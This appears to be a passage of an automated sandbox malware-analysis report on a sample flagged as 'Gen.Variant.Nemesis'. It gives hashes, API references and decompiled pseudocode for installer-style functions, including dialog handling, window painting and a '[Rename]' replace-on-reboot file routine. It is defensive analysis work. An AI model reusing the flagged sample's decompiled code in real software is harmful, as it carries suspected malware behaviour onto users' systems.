API ID:
String ID:
API String ID:
Opcode ID: 3ea1d8977f9376b643a50c4bd1bbce413083cc2e8dbd7d8796b6cd384319dbd3
Instruction ID: d9898a7c3e4058e36a1d277d27a625bac3da6ceb1eef7c698c5271ed6d15c4d5
Opcode Fuzzy Hash: 3ea1d8977f9376b643a50c4bd1bbce413083cc2e8dbd7d8796b6cd384319dbd3
Instruction Fuzzy Hash: A0519A72A403499FDF309EA485783EFB3E2EF16390F56446ADCC89B205D7349986DB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B65B6D Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 976a7577eb56aae658483f6c4ff20e1a7cbb0013854a5512fc1832b13fc46ee5
Instruction ID: 7fe116de4b50bf17b3e691df0f1d781834d0b8a78215bcbc4580230955835b8c
Opcode Fuzzy Hash: 976a7577eb56aae658483f6c4ff20e1a7cbb0013854a5512fc1832b13fc46ee5
Instruction Fuzzy Hash: 5C5125756403499FDF30AE68CDE47DB37A3AF99790F92802DDC895B204C7354A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02B60601 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35d1712c0bcd973e3d757f67b628e501ecc97c5c397f85fde609030869619767
Instruction ID: da1aec9adc9d9034625eb5790b0b4e87427be578e31d366826d1b9f28777d634
Opcode Fuzzy Hash: 35d1712c0bcd973e3d757f67b628e501ecc97c5c397f85fde609030869619767
Instruction Fuzzy Hash: C341F316E3D3058BE70130BA459C3FA2343FF62791E558AB58E6B532A1F30F0489C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 02B60AA2 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bd55b5e107a8ff62a24009537750716d37a22a8b434df3ca0506bc777fda885
Instruction ID: bf58dc852c15857af56e1ec060375d32c5224463e48c5d089e9d64bd1959f097
Opcode Fuzzy Hash: 5bd55b5e107a8ff62a24009537750716d37a22a8b434df3ca0506bc777fda885
Instruction Fuzzy Hash: 22218E28724706979B0425FC56F93FA32979F623A4EDD816A8EC797215D31E008A8A82

Uniqueness

Uniqueness Score: -1.00%

Function 02B81AA8 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c08b41a6fd827e776d7a81d93152080dad8a1eb843b68eb933a38c29e14cc3d4
Instruction ID: 179659e29c11bbab1bb25ae4bf734b2a30074f2380bdd36b86ba564a6ad45b2e
Opcode Fuzzy Hash: c08b41a6fd827e776d7a81d93152080dad8a1eb843b68eb933a38c29e14cc3d4
Instruction Fuzzy Hash: 2131C33574534A8FCB24AE6CC8E47E623A2EF27754F995269DC8D8B206F3308887C705

Uniqueness

Uniqueness Score: -1.00%

Function 02B66C0A Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea6b0e64d8f0aa1bc8318cc8128354928353658884dbd13bc2af0d8004781281
Instruction ID: 3622e9aa0c8d680a26f9d5e3c14590e9ee42d1768a489cb22d32f2a6869749d5
Opcode Fuzzy Hash: ea6b0e64d8f0aa1bc8318cc8128354928353658884dbd13bc2af0d8004781281
Instruction Fuzzy Hash: BC11A06878254ACEFF255D25460B3F52BDBFB77320B8CA6C4C9808B206E36C09478B41

Uniqueness

Uniqueness Score: -1.00%

Function 02B80E92 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.29266195329.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b60000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a288f3f3432c0945d414b6a011cf89bf6bcd499a545fe11f31753be66845c15
Instruction ID: d8661530ab78d413389c0a6f0b0cc6dac20fc55475c64e1fb83ae7e7a23b2106
Opcode Fuzzy Hash: 1a288f3f3432c0945d414b6a011cf89bf6bcd499a545fe11f31753be66845c15
Instruction Fuzzy Hash: 2AB09231210540CFCA41CE08C1A0F8073A0BB14A40B810480E8818BB12C324ED01CB00

Uniqueness

Uniqueness Score: -1.00%

Function 004043B4 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E004043B4(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b214 =  *0x42b214 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040427E(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432e80;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404663(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434ee8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434ee8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b214 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c220; // 0x6ccd6c
						_t29 = _t69 + 0x14; // 0x6ccd80
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404239(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E0040463F();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x433ebc - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404365;
				if(_t110 != 2) {
					_v8 = E0040432B;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404217(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404217(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404239( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E0040424C(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434ef4 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b214 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b214 = 0;
				return 0;
			}

0x004043c6
0x004044f3
0x00404550
0x00404554
0x00404621
0x00404623
0x00404623
0x00404629
0x00404629
0x0040462c
0x00000000
0x00404633
0x00404562
0x00404568
0x00404572
0x0040457d
0x00404580
0x00404583
0x0040458e
0x00404591
0x00404598
0x004045a5
0x004045b6
0x004045bc
0x004045c4
0x004045d2
0x004045d8
0x004045d8
0x00404598
0x004045e2
0x00000000
0x004045ed
0x004045f1
0x00404601
0x00404601
0x00404607
0x00404613
0x00404613
0x00000000
0x00404617
0x004045e2
0x004044fe
0x00000000
0x00404510
0x00404510
0x00404515
0x00404515
0x0040451b
0x00000000
0x00000000
0x00404544
0x00404546
0x0040454b
0x00000000
0x0040454b
0x004044fe
0x004043cc
0x004043cf
0x004043d4
0x004043e5
0x004043e5
0x004043ed
0x004043f0
0x004043f4
0x004043f7
0x004043fb
0x004043fe
0x00404401
0x00404404
0x0040440b
0x0040440d
0x0040440d
0x00404417
0x00404424
0x0040442e
0x00404433
0x00404436
0x0040443b
0x00404452
0x00404459
0x0040446c
0x0040446f
0x00404483
0x0040448a
0x0040448f
0x00404494
0x00404494
0x004044a2
0x004044b0
0x004044c2
0x004044c7
0x004044d7
0x004044d9
0x00000000

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404452
GetDlgItem.USER32(?,000003E8), ref: 00404466
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404483
GetSysColor.USER32(?), ref: 00404494
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044A2
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044B0
lstrlenW.KERNEL32(?), ref: 004044B5
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044C2
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004044D7
GetDlgItem.USER32(?,0000040A), ref: 00404530
SendMessageW.USER32(00000000), ref: 00404537
GetDlgItem.USER32(?,000003E8), ref: 00404562
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045A5
LoadCursorW.USER32(00000000,00007F02), ref: 004045B3
SetCursor.USER32(00000000), ref: 004045B6
LoadCursorW.USER32(00000000,00007F00), ref: 004045CF
SetCursor.USER32(00000000), ref: 004045D2
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404601
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404613

Strings

+C@, xrefs: 004045BE
N, xrefs: 00404550
Call, xrefs: 00404591

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: +C@$Call$N
API String ID: 3103080414-3697844480
Opcode ID: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
Instruction ID: 544d3524579c470af9434eda2f0c3a81960274dfcdaaec18bef3a5beb83851d9
Opcode Fuzzy Hash: 9a2d0ca3c2f6281e852f2d8aeca5f3bca76ad293f1c4d3c8d798300b4eb97cdc
Instruction Fuzzy Hash: 0C6192B1A00209BFDB109F60DD85AAA7B79FB84345F00843AF605B72D0D779A951CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434ef4;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433ee0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434ee8;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433EE0,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction ID: 68187ad06c86d7515f13608b457f8be07a0117cb3bcf177897c910b083aea3f1
Opcode Fuzzy Hash: e215112caf94b1f54c3d659d29471f2010c28c8ad64a223ce82802b434a3cd12
Instruction Fuzzy Hash: 9A418C71800209AFCF058F95DE459AF7BB9FF44315F00842AF591AA1A0C778EA54DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00405ECE Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405ECE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x4308e8 = 0x55004e;
				 *0x4308ec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t12 = GetShortPathNameW( *(_t52 + 0x1c), 0x4310e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4304e8, "%ls=%ls\r\n", 0x4308e8, 0x4310e8);
						_t53 = _t52 + 0x10;
						E004062A4(_t37, 0x400, 0x4310e8, 0x4310e8,  *((intOrPtr*)( *0x434ef4 + 0x128)));
						_t12 = E00405D74(0x4310e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E00405DF7(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405CD9(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405CD9(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405D2F(_t24 + _t46, 0x4304e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E00405E26(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00405D74(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x4308e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00405ece
0x00405ed7
0x00405ede
0x00405ee8
0x00405efc
0x00405f24
0x00405f2f
0x00405f33
0x00405f53
0x00405f5a
0x00405f64
0x00405f71
0x00405f76
0x00405f7b
0x00405f7f
0x00405f8e
0x00405f90
0x00405f9d
0x00405fa1
0x0040603c
0x00000000
0x00405fb7
0x00405fc4
0x00405fe8
0x00405fec
0x0040600b
0x0040600f
0x0040600f
0x00406011
0x0040601a
0x00406025
0x00406030
0x00406036
0x00000000
0x00406036
0x00405fee
0x00405ff1
0x00405ffc
0x00405ff8
0x00405ffa
0x00405ffb
0x00405ffb
0x00406003
0x00406005
0x00000000
0x00406005
0x00405fcf
0x00405fd5
0x00000000
0x00405fd5
0x00405fa1
0x00405f7f
0x00405efe
0x00405f09
0x00405f12
0x00405f16
0x00000000
0x00000000
0x00405f16
0x00406047

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406069,?,?), ref: 00405F09
GetShortPathNameW.KERNEL32(?,004308E8,00000400), ref: 00405F12

Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE9
Part of subcall function 00405CD9: lstrlenA.KERNEL32(00000000,?,00000000,00405FC2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D1B

GetShortPathNameW.KERNEL32(?,004310E8,00000400), ref: 00405F2F
wsprintfA.USER32 ref: 00405F4D
GetFileSize.KERNEL32(00000000,00000000,004310E8,C0000000,00000004,004310E8,?,?,?,?,?), ref: 00405F88
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F97
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCF
SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,004304E8,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406025
GlobalFree.KERNEL32(00000000), ref: 00406036
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040603D

Part of subcall function 00405D74: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
Part of subcall function 00405D74: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A

Strings

%ls=%ls, xrefs: 00405F43
[Rename], xrefs: 00405FB7, 00405FC9

Memory Dump Source

Source File: 00000001.00000002.29263497490.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.29263458831.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263562164.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263597747.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263823490.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263854635.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263883073.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29263973326.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264011357.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264061427.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264097276.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264123962.000000000046B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.29264229209.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
Instruction ID: 79e357045524b81a8ea21183b2a6189fe473d9766cb3db532b5e95eed637b89f
Opcode Fuzzy Hash: 4764efec6bbb625c57c3953ed88dd39e9a4d7ef93366e848611a72397d906ad3
Instruction Fuzzy Hash: D1315771100B05ABD220AB669D48F6B3A9CDF45744F15003FF902F62D2EA7CD9118ABC

Uniqueness

Uniqueness Score: -1.00%

Function 00406516 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00406516(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405BCA(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405B80(L"*?|<>/\":", _t5))) == 0) {
							E00405D2F(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406518
0x00406521
0x00406538
0x00406538
0x0040653f
0x0040654b
0x0040654b
0x0040654e
0x00406551
0x00406556
0x00406558
0x00406561
0x00406565
0x00406582
0x0040658a
0x0040658a
0x0040658f
0x00406591
0x00406594
0x00406599
0x0040659a
0x0040659e
0x0040659e
0x0040659f
0x004065a6
0x004065a8
0x004065af
0x00000000
0x00000000
0x004065b7
0x004065bd
0x00000000
0x00000000
0x00000000
0x004065bd
0x004065c2

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 00406579
CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406588
CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 0040658D
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.13378.9376.21815.exe",0040334E,C:\Users\user\AppData\Local\Temp\,75523420,004035BF,?,00000006,00000008,0000000A), ref: 004065A0

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00406517, 0040651C
